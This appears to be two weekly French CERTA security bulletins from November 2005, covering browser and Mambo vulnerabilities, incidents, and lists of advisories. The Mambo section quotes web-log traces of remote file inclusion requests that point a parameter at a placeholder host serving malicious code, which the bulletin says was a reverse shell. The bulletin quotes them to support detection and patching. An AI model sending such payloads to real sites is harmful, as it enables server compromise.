1 Activité en cours

1.1 Ports observés

Le tableau 3 et la figure 1 montrent les rejets pour les ports sous surveillance que nous avons constatés sur deux dispositifs de filtrage, entre le 17 et le 24 novembre 2005.

1.2 Vulnérabilité sur de multiples navigateurs

Le 21 novembre le CERTA a publié une alerte (CERTA-2005-ALE-017) concernant une vulnérabilité non corrigée dans le navigateur Microsoft Internet Explorer. Cette vulnérabilité permet l’exécution de code arbitraire sur la machine vulnérable, sans interaction de la part de l’utilisateur. Une démonstration pratique d’exploitation est disponible sur l’Internet mettant en lumière les dangers d’une telle faille. Microsoft a publié un bulletin de sécurité (911302) donnant des détails sur la vulnérabilité, notamment les méthodes de contournement provisoire.
A ce jour, la vulnérabilité n’est toujours pas corrigée. Un correctif devrait être mis à disposition par Microsoft le mardi 13 décembre 2005, à l’occasion des prochaines mises à jour de sécurité Microsoft de décembre 2005. Selon quelques messages dans plusieurs listes de diffusion, il est possible qu’un correctif soit disponible avant cette date, à savoir dans la semaine qui vient.
Mozilla Firefox et Mozilla Suite sont également affectés par cette vulnérabilité, qui permet un déni de service. L’exécution de code arbitraire sous Mozilla Firefox et Mozilla Suite n’est pas avérée.
En attendant un correctif pour Microsoft Internet Explorer, le CERTA précise dans son alerte un certain nombre de contournements provisoires, au choix : désactiver l’Active Scripting, ne naviguer que sur des sites de confiance ou utiliser un navigateur alternatif autre que Internet Explorer et Mozilla Firefox / Mozilla Suite.

1.3 Incidents traités

1.3.1 Les messages non sollicités

Le CERTA a traité un incident cette semaine concernant un message non sollicité qui n’était pas véritablement du SPAM. Le message en question était envoyé depuis une société spécialisée dans le « e-mailing » qui agit pour le compte de clients. La liste d’adresses électroniques utilisée provenait d’un autre site gérant une liste de membres.

Tous les messages à caractère publicitaire, si ce n’est pas du SPAM, sont normalement issus d’une liste où se trouve votre adresse électronique et pour laquelle vous avez validé la possibilité de recevoir des messages, suite à quoi un message de confirmation doit vous êtes envoyé. Dans les autres cas, l’utilisation de votre adresse n’est pas réglementaire. Si vous souhaitez recevoir de la publicité par message éléctronique, le CERTA vous conseille d’utiliser de multiples adresses électroniques afin d’empêcher que votre adresse électronique professionelle ne soit récupérée pour une utilisation malveillante.

1.3.2 Présence de mots de passe dans le fichier .bash_history

Le CERTA a pu constater, lors de l’analyse de machines compromises, qu’il était possible, pour un intrus ayant obtenu les droits de l’administrateur, de récupérer des mots de passe en clair dans les divers fichiers de l’historique (notamment le fichier .bash_history). En effet, certains utilisateurs tapent directement les mots de passe en clair en ligne de commande pour effectuer certaines connexions (c’est souvent le cas pour MySQL ou encore ftp). Cette mauvaise pratique permet aux intrus de récupérer facilement des mots de passe, et ensuite de compromettre d’autres machines, parfois en dehors du périmètre du réseau.

Recommandation :

Il est conseillé aux administrateurs de sensibiliser les utilisateurs sur la divulgation des mots de passe au travers des fichiers de l’historique. Si de telles pratiques étaient en usage sur vos réseaux, il serait préférable de procéder à un changement de ces mots de passe.

2 Liens utiles

• Note d’information pour limiter l’impact du SPAM ;

  http://www.certa.ssi.gouv.fr/site/CERTA-2005-INF-004/index.html
  

• Unix security checklist version 2.0 du 8 octobre 2001 (Publication du CERT australien)

  http://www.auscert.org.au/render.html?it=1935
  

3 Rappel des avis et mises à jour émis

Durant la période du 18 novembre au 1 décembre 2005, le CERTA a émis les avis suivants :

• CERTA-2005-AVI-463 : Vulnérabilité dans phpMyAdmin
• CERTA-2005-AVI-464 : Vulnérabilité de Lynx
• CERTA-2005-AVI-465 : Vulnérabilité de Mambo
• CERTA-2005-AVI-466 : Vulnérabilité de Netpbm
• CERTA-2005-AVI-467 : Vulnérabilité dans le navigateur Opéra
• CERTA-2005-AVI-468 : Vulnérabilité dans phpSysInfo
• CERTA-2005-AVI-469 : Vulnérabilité de gestionnaire de contenu Zope
• CERTA-2005-AVI-470 : Vulnérabilité du pare-feu PIX de CISCO
• CERTA-2005-AVI-471 : Multiples vulnérabilités du logiciel Joomla!
• CERTA-2005-AVI-472 : Vulnérabilité dans le logiciel FUSE
• CERTA-2005-AVI-473 : Vulnérabilité sur CISCO CSA
• CERTA-2005-AVI-474 : Multiples vulnérabilités dans la machine virtuelle
• CERTA-2005-AVI-475 : Vulnérabilité dans pcAnywhere
• CERTA-2005-AVI-476 : Multiples vulnérabiltés dans Mac OS X

Pendant cette même période, la mise à jour suivante a été publiée :

• CERTA-2005-AVI-180-002 : Vulnérabilités dans Qpopper (ajout référence au bulletin de sécurité FreeBSD)
  
• CERTA-2005-AVI-393-001 : Multiples vulnérabilités de WinRAR (ajout de la référence au bulletin de sécurité Gentoo)
  
• CERTA-2005-AVI-407-002 : Vulnérabilité dans la bibliothèque libcURL (ajout des références aux bulletins de sécuritiés Gentoo et RedHat)
  
• CERTA-2005-AVI-428-001 : Multiples vulnérabilités dans PHP (ajout des références CVE et des références aux bulletins de sécurité RedHat, Gentoo et Mandriva)
  
• CERTA-2005-AVI-438-001 : Vulnérabilité du logiciel Macromedia Flash (ajout de la référence au bulletin de sécurité Eeye et des mises à jour de sécurité FreeBSD)
  
• CERTA-2005-AVI-452-001 : Vulnérabilité des clients de messagerie Sylpheed et Sylpheed-Claws (ajout de la référence au bulletin de sécurité Gentoo)
  
• CERTA-2005-AVI-461-001 : Vulnérabilité des blibliothèques graphiques GTK+2 (ajout des références aux bulletins de sécurité Mandriva et Gentoo)
  
• CERTA-2005-AVI-434-001 : Vulnérabilité dans l’utilitaire unzip (ajout des références aux bulletins de sécurité Debian et Ubuntu)
  
• CERTA-2005-AVI-452-002 : Vulnérabilité des clients de messagerie Sylpheed et Sylpheed-Claws (ajout des références aux bulletins de sécurité Debian DSA-906 et DSA-908)
  
• CERTA-2005-AVI-105-005 : Vulnérabilité de libexif (ajout référence au bulletin de sécurité Sun #102041)
  
• CERTA-2005-AVI-190-002 : Vulnérabilité de divers outils gérant le format ELF (ajout de la référence au bulletin de sécurité Mandriva)
  
• CERTA-2004-AVI-351-001 : Vulnérabilité dans Ghostscript (ajout des références aux bulletins de sécurité FreeBSD)
  
• CERTA-2005-AVI-438-002 : Vulnérabilité du logiciel Macromedia Flash Player (ajout de la référence au bulletin de sécurité Gentoo GLSA 200511-21 et de la réference CVE CAN-2005-2628)
  
• CERTA-2005-AVI-461-002 : Vulnérabilité des blibliothèques graphiques GTK+2 (ajout de la référence au bulletin de sécurité Debian)
  
• CERTA-2005-AVI-461-003 : Vulnérabilité des blibliothèques graphiques GTK+2 (ajout de la référence au bulletin de sécurité Debian DSA-913)
  
• CERTA-2005-AVI-465-001 : Vulnérabilité de Mambo (ajout de la référence à la mise à jour FreeBSD)
  
• CERTA-2005-AVI-466-001 : Vulnérabilité de Netpbm (ajout de la référence au bulletin de sécurité Mandriva MDKSA-2005:217)
  
• CERTA-2005-AVI-467-001 : Vulnérabilité dans le navigateur Opéra (ajout des références aux mises à jour FreeBSD et à la référence CVE CAN-2005-3750)
  

1 Activité en cours

1.1 Ports observés

Le tableau 3 et la figure 1 montrent les rejets pour les ports sous surveillance que nous avons constatés sur deux dispositifs de filtrage, entre le 10 et le 24 novembre 2005.

1.2 Incidents traités

1.2.1 Défiguration suite à l’exploitation d’une faille de Mambo

Le CERTA a traité un cas de compromission suite à l’exploitation d’une faille de Mambo (voir avis CERTA-2005-AVI-465). Cette compromission a laissé une trace caractéristique dans les journaux :

xxx.xxx.xxx.xxx – – [22/Nov/2005:12:45:27 +0100] « GET /index.php?_REQUEST[option]=

com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

http://yyy/code_malveillant?&cmd=id HTTP/1.0″ 200 2160 « – » « DataCha0s/2.0 »

Le CERT-Renater nous a transmis une trace différente découverte dans un autre cas de compromission par une faille de Mambo :

[18/Nov/2005:10:42:11 +0100] « GET

/includes/mambo.php?include_path=http://yyy/code_malveillant HTTP/1.1″

200 58 « – » « Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 »

Dans le cas que nous avons traité, le code malveillant téléchargé puis exécuté était un remote reverse shell (terminal distant qui s’ouvre après une connexion sortante effectuée par le serveur piraté). Les intrus ne se sont pas contentés de défigurer le site web, ils ont élevé leurs privilèges à l’aide d’un outil exploitant une faille des noyaux 2.6.11 et antérieurs (dans la série 2.6.x).

Recommandations :

Les techniques d’exploitation de cette faille de Mambo ont été dévoilées avant la parution d’un correctif. Il est très important d’examiner vos journaux pour rechercher d’éventuelles tentatives d’intrusion, et d’appliquer le correctif le plus rapidement possible (ou bien de désactiver cet applicatif).

Nous constatons par ailleurs que les élévations de privilèges par l’exploitation d’une faille du noyau sont de plus en plus fréquentes. Il est important de mettre à jour le noyau.

Les programmes téléchargés sur les serveurs web (suite à l’exploitation de failles applicatives) sont souvent des remote reverse shell. Il est possible que votre serveur web n’ait pas besoin d’effectuer des connexions. Il est donc recommandé de réfléchir à la mise en place de filtrage en sortie.

1.3 Infection virale

Un de nos correspondants nous a signalé l’infection d’un poste par un cheval de Troie ayant, entre autres, des fonctionnalités de bot irc (programme se connectant automatiquement sur des réseaux irc –Internet Relay Chat– et pouvant y recevoir des instructions). Ce cheval de Troie a été découvert après analyse des journaux car il tentait de se connecter à des serveurs irc, et ces connexions étaient bloquées par le pare-feu. La machine infectée était un portable dont les bases de signature antivirale n’était plus à jour, car il avait été retiré du service pendant plus d’un an, avant d’être réintroduit sur le réseau.

Recommandation :

Une pratique simple pour éviter ce type de problème consiste à mettre à jour l’antivirus ainsi que sa base de signatures avant toute reconnexion sur le réseau.

1.4 Compromission d’un compte SSH

Un de nos correspondants nous a signalé la compromission d’un compte SSH sur un serveur. Un intrus est parvenu à effectuer une connexion avec les identifiants d’un utilisateur d’un serveur. Nous ignorons pour le moment comment ces identifiants ont pu être volés.

Recommandation :

Il est conseillé de filtrer -dans la mesure du possible- les adresses IP pouvant effectuer des connexions sur le serveur SSH. Il est fréquent de voir des administrateurs se connectant à distance avec un compte SSH sur des serveurs depuis des adresses IP fixes ou appartenant à des plages d’adresses connues. Ce filtrage permet d’éviter de nombreuses attaques, notamment celles effectuant de nombreuses combinaisons d’identifiants.

1.5 Faille IKE présente dans un grand nombre d’équipements

Suite à la publication d’une faille de sécurité dans IKE (Internet Key Exchange) par l’UNIRAS 273756 NISCC ISAKMP le 14 novembre 2005, plusieurs éditeurs majeurs de logiciels ainsi que de constructeurs d’équipements réseau ont publié des correctifs. Le protocole IKE permet l’échange de clefs destinées ensuite à l’établissement de tunnels IPSEC. En fonction de la mise en œuvre spécifique à chaque éditeur, l’exploitation de la vulnérabilité a un impact variable allant jusqu’au redémarrage de la machine vulnérable.

Parmi les logiciels vulnérables, on trouve :

• SUN Solaris (CERTA-2005-AVI-456) ;
• Openswan (CERTA-2005-AVI-458) ;
• VPN-1 / Firewall-1 (CERTA-2005-AVI-459).

Parmi les équipements réseau, on trouve :

• Les produits Cisco (CERTA-2005-AVI-454) ;
• les produits Nortel (CERTA-2005-AVI-460).

Recommandation :

Cette liste n’est en aucun cas exhaustive, il convient donc de vérifier sur le site de l’éditeur ou du constructeur concerné si la vulnérabilité affecte un de vos systèmes.

2 Rappel des avis et mises à jour émis

Durant la période du 14 au 18 novembre 2005, le CERTA a émis les avis suivants :

• CERTA-2005-AVI-454 : Vulnérabilité de certains produits Cisco
• CERTA-2005-AVI-455 : Multiples vulnérabilités du lecteur RealPlayer
• CERTA-2005-AVI-456 : Vulnérabilité dans Sun Solaris
• CERTA-2005-AVI-457 : Déni de service sur SpamAssassin
• CERTA-2005-AVI-458 : Vulnérabilité de la solution IPsec Openswan
• CERTA-2005-AVI-459 : Vulnérabilité du service vpnd de VPN-1/ Firewall-1
• CERTA-2005-AVI-460 : Vulnérabilité de certains équipements Nortel
• CERTA-2005-AVI-461 : Vulnérabilité des blibliothèques graphiques GTK+2
• CERTA-2005-AVI-462 : Vulnérabilité dans Novell Netmail

Pendant cette même période, la mise à jour suivante a été publiée :

• CERTA-2005-AVI-439-002 : Vulnérablilité dans fetchmail

  (ajout de la référence au bulletin de sécurité Debian)